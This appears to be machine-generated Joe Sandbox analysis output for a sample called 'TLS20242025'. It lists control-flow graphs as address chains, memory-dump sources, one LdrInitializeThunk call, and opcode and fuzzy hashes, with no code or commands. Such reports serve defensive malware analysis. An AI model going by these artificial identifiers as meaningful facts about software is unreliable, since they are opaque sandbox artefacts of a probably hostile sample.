                                                  control_flow_graph 1062 67d992c 1063 67d99eb-67d99fc 1062->1063 1064 67d99fe 1063->1064 1065 67d9a03-67d9a0c 1063->1065 1064->1065 1067 67d97e3-67d9808 1065->1067 1068 67d9a12-67d9a25 1065->1068 1069 67d980f-67d9846 1067->1069 1070 67d980a 1067->1070 1071 67d9a2c-67d9a47 1068->1071 1072 67d9a27 1068->1072 1080 67d984d-67d987f 1069->1080 1081 67d9848 1069->1081 1070->1069 1073 67d9a4e-67d9a62 1071->1073 1074 67d9a49 1071->1074 1072->1071 1078 67d9a69-67d9a7f LdrInitializeThunk 1073->1078 1079 67d9a64 1073->1079 1074->1073 1082 67d9a81-67d9b7e 1078->1082 1079->1078 1087 67d9881-67d98a6 1080->1087 1088 67d98e3-67d98f6 1080->1088 1081->1080 1085 67d9b86-67d9b90 1082->1085 1086 67d9b80-67d9b85 1082->1086 1086->1085 1092 67d98ad-67d98db 1087->1092 1093 67d98a8 1087->1093 1090 67d98fd-67d9922 1088->1090 1091 67d98f8 1088->1091 1096 67d9924-67d9925 1090->1096 1097 67d9931-67d9969 1090->1097 1091->1090 1092->1088 1093->1092 1096->1068 1098 67d996b 1097->1098 1099 67d9970-67d99d1 call 67d9328 1097->1099 1098->1099 1105 67d99d8-67d99ea 1099->1105 1106 67d99d3 1099->1106 1105->1063 1106->1105
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 067D9A6E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 00f8b68f94678ccc7872014e95dfe16b3dd38f416fb64a614a20c426e7551c3c
                                                  • Instruction ID: 88a33c4540605d818076d5e0a856315b4eb63224617da193e8a62501e8f4a140
                                                  • Opcode Fuzzy Hash: 00f8b68f94678ccc7872014e95dfe16b3dd38f416fb64a614a20c426e7551c3c
                                                  • Instruction Fuzzy Hash: F7119774E002198FEB44DFE8D884BADB7B5FBC8314F148625EA48A7242D770E942CB60
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 817a8630f62437bf29b02063d660c5be48e03d9272312567142a748accf97714
                                                  • Instruction ID: aa5ba096ffb51754ff03c2b6eff6c518fe5cab1f6fd0115066bbf574e5524f42
                                                  • Opcode Fuzzy Hash: 817a8630f62437bf29b02063d660c5be48e03d9272312567142a748accf97714
                                                  • Instruction Fuzzy Hash: 8A12A8344226539FE2682F24E5AC12EBB61FB4F727714ED20F02BC0459EB7554DA8F62

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2010 105e018-105e022 2011 105e024 2010->2011 2012 105e029-105e092 call 105e8e8 2010->2012 2011->2012 2333 105e093 call 105f2c0 2012->2333 2334 105e093 call 105f4ac 2012->2334 2335 105e093 call 105f52f 2012->2335 2028 105e099-105e0a7 call 105f71f 2337 105e0a8 call 67d0b30 2028->2337 2338 105e0a8 call 67d0b20 2028->2338 2031 105e0ae 2339 105e0af call 67d178f 2031->2339 2340 105e0af call 67d17a0 2031->2340 2032 105e0b5 2341 105e0b6 call 67d1e70 2032->2341 2342 105e0b6 call 67d1e80 2032->2342 2033 105e0bc 2343 105e0bd call 67d295f 2033->2343 2344 105e0bd call 67d2968 2033->2344 2034 105e0c3-105e0e6 2345 105e0e7 call 67de258 2034->2345 2346 105e0e7 call 67de24b 2034->2346 2040 105e0ed-105e618 2347 105e619 call 67dfc5f 2040->2347 2348 105e619 call 67dfc68 2040->2348 2230 105e61f-105e8db 2331 105e8e2-105e8e5 2230->2331 2333->2028 2334->2028 2335->2028 2337->2031 2338->2031 2339->2032 2340->2032 2341->2033 2342->2033 2343->2034 2344->2034 2345->2040 2346->2040 2347->2230 2348->2230
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ade37630d46e74ca0efcf5e4725c7e91fe13742261d03367d8b554eb39ba08fb
                                                  • Instruction ID: d17e4af1e759ed6a605cf520475c848b873a0863130ac98f2fa98175dd88338b
                                                  • Opcode Fuzzy Hash: ade37630d46e74ca0efcf5e4725c7e91fe13742261d03367d8b554eb39ba08fb
                                                  • Instruction Fuzzy Hash: D71298344226539FA6683F24E5AC12EBB61FB4F727714ED20B02FC0449EB7554DA8F62

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2349 1050c8f-1050cc0 2351 1050cc7-1050cdd call 1050780 2349->2351 2352 1050cc2 2349->2352 2355 1050ce2 2351->2355 2352->2351 2356 1050cee-105104e call 1050780 * 13 2355->2356 2430 1051056-105105f 2356->2430 2533 1051062 call 1052790 2430->2533 2534 1051062 call 10527f0 2430->2534 2431 1051068-105108f call 1053cc0 2537 1051092 call 10541a0 2431->2537 2538 1051092 call 1053e09 2431->2538 2434 1051098-10510c2 2437 10510cb-10510ce call 1055362 2434->2437 2438 10510d4-10510fe 2437->2438 2441 1051107-105110a call 105c147 2438->2441 2442 1051110-105113a 2441->2442 2445 1051143-1051146 call 105c46a 2442->2445 2446 105114c-1051176 2445->2446 2449 105117f-1051182 call 105c738 2446->2449 2450 1051188-10511b2 2449->2450 2453 10511bb-10511be call 105ca08 2450->2453 2454 10511c4-10511f7 2453->2454 2457 1051203-1051209 call 105ccd8 2454->2457 2458 105120f-105124b 2457->2458 2461 1051257-105125d call 105cfaa 2458->2461 2462 1051263-105129f 2461->2462 2465 10512ab-10512b1 call 105d278 2462->2465 2466 10512b7-10513d2 2465->2466 2479 10513de-10513f0 call 1055362 2466->2479 2480 10513f6-105145c 2479->2480 2485 1051467-1051473 call 105d548 2480->2485 2486 1051479-1051485 2485->2486 2487 1051490-105149c call 105d548 2486->2487 2488 10514a2-10514ae 2487->2488 2489 10514b9-10514c5 call 105d548 2488->2489 2490 10514cb-10514d7 2489->2490 2491 10514e2-10514ee call 105d548 2490->2491 2492 10514f4-1051500 2491->2492 2493 105150b-1051517 call 105d548 2492->2493 2494 105151d-1051529 2493->2494 2495 1051534-1051540 call 105d548 2494->2495 2496 1051546-1051552 2495->2496 2497 105155d-1051569 call 105d548 2496->2497 2498 105156f-105158c 2497->2498 2500 1051597-10515a3 call 105d548 2498->2500 2501 10515a9-10515b5 2500->2501 2502 10515c0-10515cc call 105d548 2501->2502 2503 10515d2-10515de 2502->2503 2504 10515e9-10515f5 call 105d548 2503->2504 2505 10515fb-1051607 2504->2505 2506 1051612-105161e call 105d548 2505->2506 2507 1051624-1051630 2506->2507 2508 105163b-1051647 call 105d548 2507->2508 2509 105164d-1051659 2508->2509 2510 1051664-1051670 call 105d548 2509->2510 2511 1051676-1051682 2510->2511 2512 105168d-1051699 call 105d548 2511->2512 2513 105169f-10516ab 2512->2513 2514 10516b6-10516c2 call 105d548 2513->2514 2515 10516c8-10516d4 2514->2515 2516 10516df-10516eb call 105d548 2515->2516 2517 10516f1-10517aa 2516->2517 2533->2431 2534->2431 2537->2434 2538->2434
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 963421ac7c69873f84df05301443b8411ed70c49e3773ab32ac34912b16680c3
                                                  • Instruction ID: 74f5eb0488fca42126e4f07283bfb8cc9343ae9c53ea7131affb1d326cdd691e
                                                  • Opcode Fuzzy Hash: 963421ac7c69873f84df05301443b8411ed70c49e3773ab32ac34912b16680c3
                                                  • Instruction Fuzzy Hash: A452ED74A00219CFCB65EF24EE94A9DBBB2FF88305F5085A9D509AB758DB705E81CF40

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40d979533db4d49afba89bcb745c45a6812f339304aa4237bf47272b23eada7e
                                                  • Instruction ID: 2db5d61a0c4db9cddda96224e70322eddc2b3a93199d53c3487e04cb1239321a
                                                  • Opcode Fuzzy Hash: 40d979533db4d49afba89bcb745c45a6812f339304aa4237bf47272b23eada7e
                                                  • Instruction Fuzzy Hash: 0252ED74A00219CFCBA5EF24EE94A9DBBB2FF88305F5085A9D509A7758DB305E81CF40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3016 10576f1-1057725 3017 1057b54-1057b58 3016->3017 3018 105772b-105774e 3016->3018 3019 1057b71-1057b7f 3017->3019 3020 1057b5a-1057b6e 3017->3020 3027 1057754-1057761 3018->3027 3028 10577fc-1057800 3018->3028 3025 1057b81-1057b96 3019->3025 3026 1057bf0-1057c05 3019->3026 3036 1057b9d-1057baa 3025->3036 3037 1057b98-1057b9b 3025->3037 3038 1057c07-1057c0a 3026->3038 3039 1057c0c-1057c19 3026->3039 3042 1057770 3027->3042 3043 1057763-105776e 3027->3043 3029 1057802-1057810 3028->3029 3030 1057848-1057851 3028->3030 3029->3030 3050 1057812-105782d 3029->3050 3033 1057c67 3030->3033 3034 1057857-1057861 3030->3034 3051 1057c6c-1057c9c 3033->3051 3034->3017 3040 1057867-1057870 3034->3040 3044 1057bac-1057bed 3036->3044 3037->3044 3045 1057c1b-1057c56 3038->3045 3039->3045 3048 1057872-1057877 3040->3048 3049 105787f-105788b 3040->3049 3052 1057772-1057774 3042->3052 3043->3052 3093 1057c5d-1057c64 3045->3093 3048->3049 3049->3051 3056 1057891-1057897 3049->3056 3075 105782f-1057839 3050->3075 3076 105783b 3050->3076 3077 1057cb5-1057cbc 3051->3077 3078 1057c9e-1057cb4 3051->3078 3052->3028 3053 105777a-10577dc 3052->3053 3105 10577e2-10577f9 3053->3105 3106 10577de 3053->3106 3059 105789d-10578ad 3056->3059 3060 1057b3e-1057b42 3056->3060 3073 10578c1-10578c3 3059->3073 3074 10578af-10578bf 3059->3074 3060->3033 3064 1057b48-1057b4e 3060->3064 3064->3017 3064->3040 3079 10578c6-10578cc 3073->3079 3074->3079 3080 105783d-105783f 3075->3080 3076->3080 3079->3060 3086 10578d2-10578e1 3079->3086 3080->3030 3087 1057841 3080->3087 3088 10578e7 3086->3088 3089 105798f-10579ba call 1057538 * 2 3086->3089 3087->3030 3091 10578ea-10578fb 3088->3091 3107 1057aa4-1057abe 3089->3107 3108 10579c0-10579c4 3089->3108 3091->3051 3096 1057901-1057913 3091->3096 3096->3051 3098 1057919-1057931 3096->3098 3161 1057933 call 1057f64 3098->3161 3162 1057933 call 1057fa4 3098->3162 3163 1057933 call 1057fe4 3098->3163 3164 1057933 call 1057ecd 3098->3164 3165 1057933 call 1057ec9 3098->3165 3166 1057933 call 1058055 3098->3166 3167 1057933 call 1057f35 3098->3167 3168 1057933 call 1057ed5 3098->3168 3169 1057933 call 1057f54 3098->3169 3170 1057933 call 1057f31 3098->3170 3171 1057933 call 1057ed1 3098->3171 3172 1057933 call 1057f3d 3098->3172 3173 1057933 call 1057f39 3098->3173 3174 1057933 call 10580d8 3098->3174 3101 1057939-1057949 3101->3060 3104 105794f-1057952 3101->3104 3109 1057954-105795a 3104->3109 3110 105795c-105795f 3104->3110 3105->3028 3106->3105 3107->3017 3130 1057ac4-1057ac8 3107->3130 3108->3060 3112 10579ca-10579ce 3108->3112 3109->3110 3113 1057965-1057968 3109->3113 3110->3033 3110->3113 3115 10579f6-10579fc 3112->3115 3116 10579d0-10579dd 3112->3116 3117 1057970-1057973 3113->3117 3118 105796a-105796e 3113->3118 3119 1057a37-1057a3d 3115->3119 3120 10579fe-1057a02 3115->3120 3133 10579ec 3116->3133 3134 10579df-10579ea 3116->3134 3117->3033 3121 1057979-105797d 3117->3121 3118->3117 3118->3121 3123 1057a3f-1057a43 3119->3123 3124 1057a49-1057a4f 3119->3124 3120->3119 3122 1057a04-1057a0d 3120->3122 3121->3033 3127 1057983-1057989 3121->3127 3128 1057a1c-1057a32 3122->3128 3129 1057a0f-1057a14 3122->3129 3123->3093 3123->3124 3131 1057a51-1057a55 3124->3131 3132 1057a5b-1057a5d 3124->3132 3127->3089 3127->3091 3128->3060 3129->3128 3135 1057b04-1057b08 3130->3135 3136 1057aca-1057ad4 call 10563e0 3130->3136 3131->3060 3131->3132 3137 1057a92-1057a94 3132->3137 3138 1057a5f-1057a68 3132->3138 3139 10579ee-10579f0 3133->3139 3134->3139 3135->3093 3142 1057b0e-1057b12 3135->3142 3136->3135 3150 1057ad6-1057aeb 3136->3150 3137->3060 3140 1057a9a-1057aa1 3137->3140 3145 1057a77-1057a8d 3138->3145 3146 1057a6a-1057a6f 3138->3146 3139->3060 3139->3115 3142->3093 3147 1057b18-1057b25 3142->3147 3145->3060 3146->3145 3152 1057b34 3147->3152 3153 1057b27-1057b32 3147->3153 3150->3135 3158 1057aed-1057b02 3150->3158 3155 1057b36-1057b38 3152->3155 3153->3155 3155->3060 3155->3093 3158->3017 3158->3135 3161->3101 3162->3101 3163->3101 3164->3101 3165->3101 3166->3101 3167->3101 3168->3101 3169->3101 3170->3101 3171->3101 3172->3101 3173->3101 3174->3101
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a58b3e3821f7407cc61252068dd285f7af389f76cbea7c4b5dd6374a1a3e3c69
                                                  • Instruction ID: d486723f790a3f4ea4cb2c7d508552136725d7f4d313839b621f22bc59be24b1
                                                  • Opcode Fuzzy Hash: a58b3e3821f7407cc61252068dd285f7af389f76cbea7c4b5dd6374a1a3e3c69
                                                  • Instruction Fuzzy Hash: AA125C30A00249DFDB95CF68D884AAEBFF1FF89314F548599E9859B261DB30ED41CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3670 1055f38-1055f5a 3671 1055f70-1055f7b 3670->3671 3672 1055f5c-1055f60 3670->3672 3675 1055f81-1055f83 3671->3675 3676 1056023-105604f 3671->3676 3673 1055f62-1055f6e 3672->3673 3674 1055f88-1055f8f 3672->3674 3673->3671 3673->3674 3677 1055f91-1055f98 3674->3677 3678 1055faf-1055fb8 3674->3678 3679 105601b-1056020 3675->3679 3682 1056056-10560ae 3676->3682 3677->3678 3680 1055f9a-1055fa5 3677->3680 3754 1055fba call 1055f38 3678->3754 3755 1055fba call 1055f2a 3678->3755 3680->3682 3683 1055fab-1055fad 3680->3683 3702 10560b0-10560b6 3682->3702 3703 10560bd-10560cf 3682->3703 3683->3679 3684 1055fc0-1055fc2 3685 1055fc4-1055fc8 3684->3685 3686 1055fca-1055fd2 3684->3686 3685->3686 3689 1055fe5-1056004 call 10569a0 3685->3689 3690 1055fd4-1055fd9 3686->3690 3691 1055fe1-1055fe3 3686->3691 3696 1056006-105600f 3689->3696 3697 1056019 3689->3697 3690->3691 3691->3679 3749 1056011 call 105aef0 3696->3749 3750 1056011 call 105afad 3696->3750 3697->3679 3699 1056017 3699->3679 3702->3703 3705 10560d5-10560d9 3703->3705 3706 1056163-1056165 3703->3706 3707 10560e9-10560f6 3705->3707 3708 10560db-10560e7 3705->3708 3751 1056167 call 1056300 3706->3751 3752 1056167 call 10562f0 3706->3752 3716 10560f8-1056102 3707->3716 3708->3716 3709 105616d-1056173 3710 1056175-105617b 3709->3710 3711 105617f-1056186 3709->3711 3714 10561e1-1056240 3710->3714 3715 105617d 3710->3715 3728 1056247-105625e 3714->3728 3715->3711 3719 1056104-1056113 3716->3719 3720 105612f-1056133 3716->3720 3731 1056115-105611c 3719->3731 3732 1056123-105612d 3719->3732 3721 1056135-105613b 3720->3721 3722 105613f-1056143 3720->3722 3724 105613d 3721->3724 3725 1056189-10561da 3721->3725 3722->3711 3726 1056145-1056149 3722->3726 3724->3711 3725->3714 3726->3728 3729 105614f-1056161 3726->3729 3729->3711 3731->3732 3732->3720 3749->3699 3750->3699 3751->3709 3752->3709 3754->3684 3755->3684
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd515eeb4b4ad9d0e15ab4b4e002b84d947700a97a30c1e97cae3c7568388e27
                                                  • Instruction ID: b77bdaeb11873d551d38c55602c3dd6b061c098b5c68d571acf1f7cdd5a814d7
                                                  • Opcode Fuzzy Hash: bd515eeb4b4ad9d0e15ab4b4e002b84d947700a97a30c1e97cae3c7568388e27
                                                  • Instruction Fuzzy Hash: B491AF303042458FDB59AF68D854B7F7BE2AFC9300F188469E9868B396CF358C42CB95
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c56314fe52d3b86ec3f7bd067155c9e75a8af540c2f0866b55209b7b30292a5
                                                  • Instruction ID: 8fea94f746db6cceed934029ac1ac94b45541ac425a90411dd81c1cc69807417
                                                  • Opcode Fuzzy Hash: 2c56314fe52d3b86ec3f7bd067155c9e75a8af540c2f0866b55209b7b30292a5
                                                  • Instruction Fuzzy Hash: 6A819F34A00505CFDB98CF6DC4849AEBBF2FF89214B9481A9D985D7365DB32EC41CB61
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c5d858d91c7a27fddde9f39ea9daf19f98e00f8393ff4816c3d704d21d2fd47
                                                  • Instruction ID: e8e5ae0603dbb51eb142cb2e370e2d40f4493e33c64572fa1ffba1233734f1b7
                                                  • Opcode Fuzzy Hash: 3c5d858d91c7a27fddde9f39ea9daf19f98e00f8393ff4816c3d704d21d2fd47
                                                  • Instruction Fuzzy Hash: B77128347006058FDBA5DF6EC884AAE7FE5AF89280B1580AAED52DB361DB70DC41CB50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e6a7dd2c7c44043ba9b047e5034384397213228cb40afd73b7ddb7f2481fd07
                                                  • Instruction ID: 39d80f888339d7881ebad5ec07e11b0edbea2c964e49236c9e3c5f5e7fcc56d5
                                                  • Opcode Fuzzy Hash: 4e6a7dd2c7c44043ba9b047e5034384397213228cb40afd73b7ddb7f2481fd07
                                                  • Instruction Fuzzy Hash: 8C613134E01219DFDB15DFE4D844AAEBBB2FF88304F208529D905AB355DB795A45CF40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d1756bc82a15e9e86948a3a8ef505def686d4bac3a745ccdcf3d746948f7667
                                                  • Instruction ID: a74207a676763ca19b56179be687be8bf2403efabfc3d6849ebe06b4815c7522
                                                  • Opcode Fuzzy Hash: 5d1756bc82a15e9e86948a3a8ef505def686d4bac3a745ccdcf3d746948f7667
                                                  • Instruction Fuzzy Hash: B3518F30700245DFDB55DF68C844BAFBBE6EB88354F1484A6E949CB256DB71CC41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 582a5d105d926d64222163810b528ca72a47f2e5e6b4bcc87f7f32937746e459
                                                  • Instruction ID: a3a12cccf104681a681adbd089049bf0ba59a6fcf95b29d4b615592ef38c393e
                                                  • Opcode Fuzzy Hash: 582a5d105d926d64222163810b528ca72a47f2e5e6b4bcc87f7f32937746e459
                                                  • Instruction Fuzzy Hash: E04124317042449FC7199F78D814AAEBFF6AFC9210B1880AAE956D7292DE319C05CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 490f84e368efb6fa94d0fa6b8bed3adb1c84e4adfc6d9a0dd4fe2f7f1199c8fa
                                                  • Instruction ID: 3eff84e5ece4d8e908c1f7bcc258336a676d08fe2df56cfd822f0f21c4fb9257
                                                  • Opcode Fuzzy Hash: 490f84e368efb6fa94d0fa6b8bed3adb1c84e4adfc6d9a0dd4fe2f7f1199c8fa
                                                  • Instruction Fuzzy Hash: 0F51A274E01248DFDB54DFA9D9849DDBBF2BF89300F24816AE809AB365DB31A901CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9035a5a5306c83adf5403d960fbaee5087b48ad3c1eebc5a16c09892d5c7f8c
                                                  • Instruction ID: 71b2cd35adbc33b25f6f4ec356da4b3f9ac7200faea5c2b9492977ec880fdc7b
                                                  • Opcode Fuzzy Hash: d9035a5a5306c83adf5403d960fbaee5087b48ad3c1eebc5a16c09892d5c7f8c
                                                  • Instruction Fuzzy Hash: 99519274E01248CFCB48DFA9D58499DBBF2FF89314B609469E809AB364DB35AD42CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c3d9268ade68095f2fa8dc921e4ff39c0aab6b0dc6c98af3c167a3af275d800
                                                  • Instruction ID: d7c9d151e597ad36372153c3e72f7f54363d9e93d7611620368c3fedf9359d41
                                                  • Opcode Fuzzy Hash: 7c3d9268ade68095f2fa8dc921e4ff39c0aab6b0dc6c98af3c167a3af275d800
                                                  • Instruction Fuzzy Hash: 6A41D031B04249DFCF56CFA8C844A9EBFF1AF89314F048295E9959B252D770E914CB50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e6085f2c8b8fbdb2d046d7ba215abed5decffaee7438da0db1c1e9c47ead5b5
                                                  • Instruction ID: fa2dbccbd813cdaad9f1cc45e56f9318fc0c8740c132bc8f167632846ef3cdeb
                                                  • Opcode Fuzzy Hash: 2e6085f2c8b8fbdb2d046d7ba215abed5decffaee7438da0db1c1e9c47ead5b5
                                                  • Instruction Fuzzy Hash: 2A31C331B0422987DF9865AEA89427FA9FABBC4390F144079DD528B385EEB488408771
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b20015e2d2261adfc180cc36f748df46e47664f819416d1b7ecb915ace74ce0
                                                  • Instruction ID: 571a6e3d4755457c7d2bce92ae97f4e5e2bfef3e6f7b3e9ce2b33f01cbc673f3
                                                  • Opcode Fuzzy Hash: 2b20015e2d2261adfc180cc36f748df46e47664f819416d1b7ecb915ace74ce0
                                                  • Instruction Fuzzy Hash: F731E8303041518FD7BA8B3ED85467F7BA6EB88700B1484ABFE92CB292DE64CC408755
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4d7bf6319457296f4e740b46442b570a874c658d1e48bb3295ebb3f8e0db29d
                                                  • Instruction ID: e834ca97bd67122227dd23c8427767ec268df70858d8bfc3bc03bed41b11a5d2
                                                  • Opcode Fuzzy Hash: b4d7bf6319457296f4e740b46442b570a874c658d1e48bb3295ebb3f8e0db29d
                                                  • Instruction Fuzzy Hash: 38318F3120414DDFCB55AF64E954AAF7BA2FF48300F008065FD5597259CB39CA61DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80863fe17d30ace071d7dcdc2eb6375e5316a204d8238cb9c29e9038f4d4112d
                                                  • Instruction ID: edd6184976f3b80363ba7bc8f7642f3fb46f25422cf4d81af5a1281f83339b0b
                                                  • Opcode Fuzzy Hash: 80863fe17d30ace071d7dcdc2eb6375e5316a204d8238cb9c29e9038f4d4112d
                                                  • Instruction Fuzzy Hash: CD313674D05249CFCB46EFB8D8045AEBFF4EF4A304F1041AAD944A7265EB351A85CBA2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e6de7f66db7286ef45c48596447620669f934d88867f5734f0f5bdcee6b7156
                                                  • Instruction ID: 68cba093851d0a9457dcf950895258ee05900097eadd8b882d64cfbd50656012
                                                  • Opcode Fuzzy Hash: 1e6de7f66db7286ef45c48596447620669f934d88867f5734f0f5bdcee6b7156
                                                  • Instruction Fuzzy Hash: E121A1303002118BDBA55A2B845477F7A86AFC4748F14C07EDE46CB7A9EE65CC829B91
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4584968696.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a6cfe8c5aee288215423e67febf86f82f088eb63347a50dd9a490aba2684361
                                                  • Instruction ID: a907f636418ed1455c83c8db2c026d0f8fddf97ee69b0255f0bafbe2309fc625
                                                  • Opcode Fuzzy Hash: 5a6cfe8c5aee288215423e67febf86f82f088eb63347a50dd9a490aba2684361
